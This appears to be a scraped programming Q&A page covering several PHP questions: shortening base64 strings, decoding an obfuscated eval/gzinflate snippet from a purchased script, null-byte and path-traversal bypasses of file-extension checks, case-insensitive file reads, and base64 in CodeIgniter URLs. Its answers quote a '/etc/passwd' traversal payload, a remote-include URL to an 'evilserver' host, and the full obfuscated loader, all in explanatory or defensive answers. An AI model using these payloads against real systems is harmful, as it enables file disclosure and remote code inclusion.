PHP - alternative to Base64 with shorter results? - php

I'm currently using base64 to encode a short string and decode it later, and wonder if a better (shorter) alternative is possible.
$string = '/path/to/img/image.jpg';
$convertedString = base64_encode($string);
// New session, new user
$convertedString = 'L3BhdGgvdG8vaW1nL2ltYWdlLmpwZw==';
$originalString = base64_decode('L3BhdGgvdG8vaW1nL2ltYWdlLmpwZw==');
// Can $convertedString be shorter by any means ?
Requirements :
Shorter result possible
Must be reversible any time in a different session (therefore unique)
No security needed (anyone can guess it)
Any kind of characters that can be used in a URL (except slashes)
Can be an external lib
Goal :
Get a clean unique id from a path file that is not the path file and can be used in a URL, without using a database.
I've searched and read a lot, looks like it doesn't exist but couldn't find a definitive answer.

Well since you're using these in a URL, why not use rawurlencode($string) and rawurldecode($encodedString)?
If you can reserve one character like - (i.e., ensure that - never appears in your file names), you can do even better by doing rawurlencode(str_replace('/', '-', $string)) and str_replace('-', '/', rawurldecode($encodedString)). Depending on the file names you pick, this will create IDs that are the same length as the original filename. (This won't work if your file names have multi-byte characters in them; you will need to use some mb_* functions for that case.)
You could try using compression functions, but for strings as short as file paths, compression usually makes the output larger than the input.
Ultimately, unless you are willing to use a database, disallow certain file names, or you know something about what kinds of file names will come up, the best you can hope for is IDs that are as short or almost as short as the original file names. Otherwise, this would be a universal compression function, which is impossible.

I don't think there is anything reliable out there that would significantly shorten the encoded string and keep it URL friendly.
e.g. if you use something like
$test = gzcompress(base64_encode($parameter), 9, ZLIB_ENCODING_DEFLATE);
echo $test;
it would generate characters that are not URL-friendly and any post-transformation would be just a risky mess.
However, you can easily transform text to get URL-friendly parameters.
I use the following code to generate URL-friendly parameters:
$encodedParameter = urlencode(base64_encode($parameter));
And the following code to decode it:
$parameter = base64_decode(urldecode($encodedParameter));
As an alternative solution, you could use generated tokens to map known files using some database.

Related

how to decode php base64_decode

I'm a newbie starting to learn from source code. I bought a source code on the internet with full source code switching but it turns out there is a part that is hidden. How to do decrypt/decode for lines like this:
<?php
$keystroke1 = base64_decode("d2RyMTU5c3E0YXllejd4Y2duZl90djhubHVrNmpoYmlvMzJtcA==");
eval(gzinflate(base64_decode('hY5NCsIwEIWv8ixdZDCKWZcuPUfRdqrBmsBkAkrp3aVIi3Tj9v1+vje7PodWfQwNv3zSZAqJyqGNHRdE4+JiVU2ZVHy42fLyjDkoYUT54DdqpHxNKmsAJwtHFXxvksrAYXGort1cE9YsAe1dTJTOzCuEPZbhChN4SPw/iePMd/7ybSmcxeb+4Mj+vkzTBw==')));
$O0O0O0O0O0O0=$keystroke1[2].$keystroke1[32].$keystroke1[20].$keystroke1[11].$keystroke1[23].$keystroke1[15].$keystroke1[32].$keystroke1[1].$keystroke1[11];
$keystroke2 = $O0O0O0O0O0O0("xes26:tr5bzf{8ydhog`uw9omvl7kicjp43nq", -1);
$OO000OO000OO=$keystroke2[16].$keystroke2[12].$keystroke2[31].$keystroke2[23].$keystroke2[18].$keystroke2[24].$keystroke2[9].$keystroke2[20].$keystroke2[11];
$O0000000000O=$keystroke1[30].$keystroke1[9].$keystroke1[6].$keystroke1[11].$keystroke1[27].$keystroke1[8].$keystroke1[19].$keystroke1[1].$keystroke1[11].$keystroke1[15].$keystroke1[32].$keystroke1[1].$keystroke1[11];
eval($OO000OO000OO(base64_decode('LcTLsm
tKAADQn7lVZ+8yoBtB3ZH3OyEEMbnl0SLxTJrQvv
5M7hos9C36n38uF4Zh/u+nLDA6cf/VqJpq9PPHq2
IHD+dQlrVwpIa3BPicV2atbjLVsx+to7il1297dn
c+9PeDJGOoGn0MJUJnSqiJwrGcK5/bG2iiJtUoOk
3GKbHYjjzd5yLu3q2dPpWSFjDVTKWSS6MFsF6MU5
dsbJn7qHRxhGo0MNuluk29F3iwyAx/cYO+OfPWi1
ECDkWG1NsMLuAcM3F98vtMsubbvQjf1ZpVMUP5Eh
puFNzCi/CYkoM1VgsAetzjpvEe1M2AlX4YFjQZF0
A0VBRQKS0B5mcI7na2N/nER993+qocgmh9WawUrU
YhBMUiPNpuXNQy2o7VxHvhyO3nZkcWTmQu5kV1C2
ECbZiH8XsL4QuYbf7lI4SF1gDM/vVqRz4qyj7a8b
qS1nXP79731t4O0qcDaqN97BHDzlPwTEF6H7p9a3
Zu1Ut6X5GNTgZhWe3dHa+6yzJ58MX1Pc8mwAWK4v
EVLjGolQQLieOvkn4jD4d0FMQuLYvXhaxbzJyLR2
OHDKhMu2EwHthDt+I7YwOvVUydwEnCigk/n4iQei
SzwWNKicdunzmrVoOWl9gt8lhK+WzNpbPqkHEK7i
xBHT84UAbkHpity8i9eLUUulASI5d7cfpGWF6I4l
7tYBeJmYzXycA3FbbrSb+yNgd8XM5u7wU0mL8tVP
hJ2J/nu2QLr/OgzZrmp7xvKmpZCgHU7w0RlS1PT9
4JvxXtekif9dDGvBxSQjcwj2i32C7Abbcosvey5I
iq2hW7mjn/lUS6OUQ64Kw/v7+///4F')));
?>
is code like this dangerous?
You are looking at a piece of obfuscated code. I will explain it line by line, but first let's go over the functions that are used:
base64_decode()
This function decodes a base64 encoded string. It's used here to unscramble intentionally scrambled code.
gzinflate()
This function decompresses a compressed string. It's used the same way as base64_decode().
eval()
This function executes a string as code. Its use is discouraged and is in itself a bit of a red flag, though it has legitimate uses.
$keystroke1 = base64_decode("d2RyMTU5c3E0YXllejd4Y2duZl90djhubHVrNmpoYmlvMzJtcA==");
This line creates an apparently random string of characters: wdr159sq4ayez7xcgnf_tv8nluk6jhbio32mp
This string is saved to a variable, $keystroke1. The string itself is not important, other than that it contains some letters that are used later.
eval(gzinflate(base64_decode('hY5NCsIwEIWv8ixdZDCKWZcuPUfRdqrBmsBkAkrp3aVIi3Tj9v1+vje7PodWfQwNv3zSZAqJyqGNHRdE4+JiVU2ZVHy42fLyjDkoYUT54DdqpHxNKmsAJwtHFXxvksrAYXGort1cE9YsAe1dTJTOzCuEPZbhChN4SPw/iePMd/7ybSmcxeb+4Mj+vkzTBw==')));
This line unscrambles a doubly scrambled string and then runs this resulting code:
if(!function_exists("rotencode")){function rotencode($string,$amount) { $key = substr($string, 0, 1); if(strlen($string)==1) { return chr(ord($key) + $amount); } else { return chr(ord($key) + $amount) . rotEncode(substr($string, 1, strlen($string)-1), $amount); }}}
This creates a new function called rotencode(), which is yet another way of unscrambling strings.
$O0O0O0O0O0O0=$keystroke1[2].$keystroke1[32].$keystroke1[20].$keystroke1[11].$keystroke1[23].$keystroke1[15].$keystroke1[32].$keystroke1[1].$keystroke1[11];
This line takes specific characters from that random string from earlier to create the word "rotencode" as a string, stored in the variable named $O0O0O0O0O0O0.
$keystroke2 = $O0O0O0O0O0O0("xes26:tr5bzf{8ydhog`uw9omvl7kicjp43nq", -1);
This line uses the rotencode() function to unscramble yet another string (actually exactly the same string as before, for some reason).
$OO000OO000OO=$keystroke2[16].$keystroke2[12].$keystroke2[31].$keystroke2[23].$keystroke2[18].$keystroke2[24].$keystroke2[9].$keystroke2[20].$keystroke2[11];
$O0000000000O=$keystroke1[30].$keystroke1[9].$keystroke1[6].$keystroke1[11].$keystroke1[27].$keystroke1[8].$keystroke1[19].$keystroke1[1].$keystroke1[11].$keystroke1[15].$keystroke1[32].$keystroke1[1].$keystroke1[11];
On these lines the two (identical but separate) random strings are used to create the words gzinflate and base64_decode. This is done so the coder can use these functions without it being apparent that that's what is happening. However, base64_decode() is never used this way in the snippet you posted. That might suggest that it is used later in the code in places you haven't seen or recognized yet. Searching your code for "$O0000000000O" might yield other uses.
eval($OO000OO000OO(base64_decode('LcTLsmtKAADQn7lVZ+8yoBtB3ZH3OyEEMbnl0SLxTJrQvv5M7hos9C36n38uF4Zh/u+nLDA6cf/VqJpq9PPHq2IHD+dQlrVwpIa3BPicV2atbjLVsx+to7il1297dnc+9PeDJGOoGn0MJUJnSqiJwrGcK5/bG2iiJtUoOk3GKbHYjjzd5yLu3q2dPpWSFjDVTKWSS6MFsF6MU5dsbJn7qHRxhGo0MNuluk29F3iwyAx/cYO+OfPWi1ECDkWG1NsMLuAcM3F98vtMsubbvQjf1ZpVMUP5EhpuFNzCi/CYkoM1VgsAetzjpvEe1M2AlX4YFjQZF0A0VBRQKS0B5mcI7na2N/nER993+qocgmh9WawUrUYhBMUiPNpuXNQy2o7VxHvhyO3nZkcWTmQu5kV1C2ECbZiH8XsL4QuYbf7lI4SF1gDM/vVqRz4qyj7a8bqS1nXP79731t4O0qcDaqN97BHDzlPwTEF6H7p9a3Zu1Ut6X5GNTgZhWe3dHa+6yzJ58MX1Pc8mwAWK4vEVLjGolQQLieOvkn4jD4d0FMQuLYvXhaxbzJyLR2OHDKhMu2EwHthDt+I7YwOvVUydwEnCigk/n4iQeiSzwWNKicdunzmrVoOWl9gt8lhK+WzNpbPqkHEK7ixBHT84UAbkHpity8i9eLUUulASI5d7cfpGWF6I4l7tYBeJmYzXycA3FbbrSb+yNgd8XM5u7wU0mL8tVPhJ2J/nu2QLr/OgzZrmp7xvKmpZCgHU7w0RlS1PT94JvxXtekif9dDGvBxSQjcwj2i32C7Abbcosvey5Iiq2hW7mjn/lUS6OUQ64Kw/v7+///4F')));
This is where it all comes together. This line unscrambles a line of code which has been compressed and encoded 10 times over. The final result is this:
$cnk = array('localhost');
That's it. It sets the string "localhost" as the sole element of an array and saves it in a variable named $cnk.
In and of itself, there's nothing hazardous about running this code, but noting the lengths that the coder went to in order to hide this line, it's probably a safe bet that it wasn't placed there to help you - the buyer - in any way. Search your code for the $cnk variable if you want to know exactly what's being done. Or better yet, chalk this experience down to a loss and find a better way to learn coding. There are plenty of books, video tutorials and free resources online. Do not place your trust in whoever sold you this code. While they may not have been malicious (people suggested in comments that this might be part of a license check), anyone who includes something like this in their code is not someone you should be learning from.
Good luck on your coding journey!

Which special characters can cause a file path to be misinterpreted?

For example, there is function (pseudo code):
if ($_GET['path'] ENDS with .mp3 extension) { read($_GET['path']); }
but is it possible, that hacker in a some way, used a special symbol/method, i.e.:
path=file.php^example.mp3
or
path=file.php+example.mp3
or etc...
if something such symbol exists in php, as after that symbol, everything was ignored, and PHP tried to open file.php..
p.s. DONT POST ANSWERS about PROTECTION! I NEED TO KNOW IF THIS CODE can be bypassed, as I AM TO REPORT MANY SCRIPTS for this issue (if this is really an issue).
if something such symbol exists in php, as after that symbol, everything was ignored, and PHP tried to open file.php..
Yes, such a symbol exists; it is called the 'null byte' ("\0").
Because in C (the language used to write the PHP engine) the end of a 'string' is signalled by the null byte. So, whenever a null byte is encountered, the string will end.
If you want the string to end with .mp3 you should manually append it.
Having said that, it is, generally speaking, a very bad idea to accept a user supplied path from a security standpoint (and I believe you are interested in the security aspect of this, because you originally posted this question on security.SE).
Consider the situation where:
$_GET['path'] = "../../../../../etc/passwd\0";
or a variation on this theme.
The leading concept in programming is "Don't trust user input". So the main problem in your case is not a special character its how you work with your data. So you shouldn't use a path given by a user because the user can manipulate the path or other variables.
To escape a user input to prevent bad characters you can use htmlspecialchars or you can filter your get input with filter_input something like that:
$search_html = filter_input(INPUT_GET, 'search', FILTER_SANITIZE_SPECIAL_CHARS);
WE CAN'T TELL IF YOU IF THE CODE CAN BE "BYPASSED" BECAUSE YOU'VE NOT GIVEN US ANY PHP CODE
As to the question of whether its possible to trick PHP into processing a file it shouldn't based on the end of the string, then the answer is only if there is another file somewhere else which has the same ending. However, by default, PHP will happily read from URLs using the same functionality as reading from local files, consider:
http://yourserver.com/yourscript.php?path=http%3A%2F%2Fevilserver.com%2Fpwnd_php.txt%3Ffake_end%3Dmp3

Upper or Lower Case Issue using get_file_contents php

I am using a PHP GET method to grab a file name that then is placed in a get_file_contents command. If it is possible, I would like to ignore letter case so that my URL's are cleaner.
For instance, example.com/file.php?n=File-Name will work but example.com/file.php?n=file-name will not work using the code below. I feel like this should be easy but I'm coming up dry. Any thoughts?
$file = $_GET['n'];
$file_content = file_get_contents($file);
Lowercase all your filenames and use:
file_get_contents(strtolower($file));
(I hope you're aware of some of the risks involved in using this.)
The Linux filesystem is case sensitive. If you want to do case insensitive matching against files that already exist on the user's machine, your only option is to obtain a directory listing and do case-insensitive comparison.
But you don't explain where the download URLs come from. If you already know the correct filenames and you want to generate prettier URLs, you can keep a list of the true pathnames and look them up when you receive a case-normalized one in a URL (you could even rename them completely, obfuscate, etc.)

Determine if a PHP resource contains binary or text

I am using MongoDB and storing files into GridFS using PHP. I am pulling files out via:
$mongo = new Mongo;
$images = $monogo->my_db->getGridFS('images');
$image = $images->findOne('epic-beard-man.png');
$stream = $image->getResource();
Which is cool, because $stream is a PHP resource. The thing I need, is to determine if the stream/resource is binary or text. If it is text, I want to output it, otherwise if it is binary, I don't want to output it.
Is there a magical function like: is_binary($stream)
EDIT
echo get_resource_type($stream);
Returns STREAM. Hum, not very useful.
You cannot check this without actually reading from the resource. You can read the whole thing and look for non-printable characters (which should happen pretty fast if it is an image). You can check for "printability" with ctype_print, which will unfortunately return false for tabs and newlines, so it may not be the best one after all. You can also build your own regex to check the data:
preg_match(':^(\P{Cc}|[\t\n])*$:', $data)
The best and easiest thing to do is however to save the data type, possibly the MIME type, together with the object. That way you do not need to do anything magic at display time.
I think that schemaless databases like MongoDB needs at least as much care in the design stage as relational databases. This is a typical thing to think about when designing a database: what type do my data have?

using a base64 encoded string in url with codeigniter

I have an encrypted, base64 encoded array that I need to put into a url and insert into emails we send to clients to enable them to be identified (uniquely) - the problem is that base64_encode() often appends an = symbol or two after it's string of characters, which by default is disallowed by CI.
Here's an example:
http://example.com/cec/pay_invoice/VXpkUmJnMWxYRFZWTEZSd0RXZFRaMVZnQWowR2N3TTdEVzRDZGdCbkQycFFaZ0JpQmd4V09RRmdWbkVMYXdZbUJ6OEdZQVJ1QlNJTU9Bb3RWenNFSmxaaFVXcFZaMXQxQXpWV1BRQThVVEpUT0ZFZ0RRbGNabFV6VkNFTlpsTWxWV29DTmdackEzQU5Nd0lpQURNUGNGQS9BRFlHWTFacUFTWldOZ3M5QmpRSGJBWTlCREVGWkF4V0NtQlhiZ1IzVm1CUk9sVm5XMllEWlZaaEFHeFJZMU51VVdNTmJsdzNWVzlVT0EwZw==
Now I understand I can allow the = sign in config.php, but I don't fully understand the security implications in doing so (it must have been disabled for a reason right?)
Does anyone know why it might be a bad idea to allow the = symbol in URLs?
Thanks!
John.
Not sure why = is disallowed, but you could also leave off the equals signs.
$base_64 = base64_encode($data);
$url_param = rtrim($base_64, '=');
// and later:
$base_64 = $url_param . str_repeat('=', strlen($url_param) % 4);
$data = base64_decode($base_64);
The base64 spec only allows = signs at the end of the string, and they are used purely as padding, there is no chance of data loss.
Edit: It's possible that it doesn't allow this as a compatibility option. There's no reason that I can think of from a security perspective, but there's a possibility that it may mess with query string parsing somewhere in the tool chain.
Please add the character "=" to $config['permitted_uri_chars'] in your config.php file you can find that file at application/config folder
Originally there are no any harmful characters in the url at all. But there are not experienced developers or bad-written software that helps some characters to become evil.
As of = - I don't see any issues with using it in urls
Instead of updating config file you can use urlencode and urldecode function of native php.
$str=base64_encode('test');
$url_to_be_send=urlencode($str);
//send it via url
//now on reciveing side
//assuming value passed via get is stored in $encoded_str
$decoded_str=base64_decode(urldecode($encoded_str));

Categories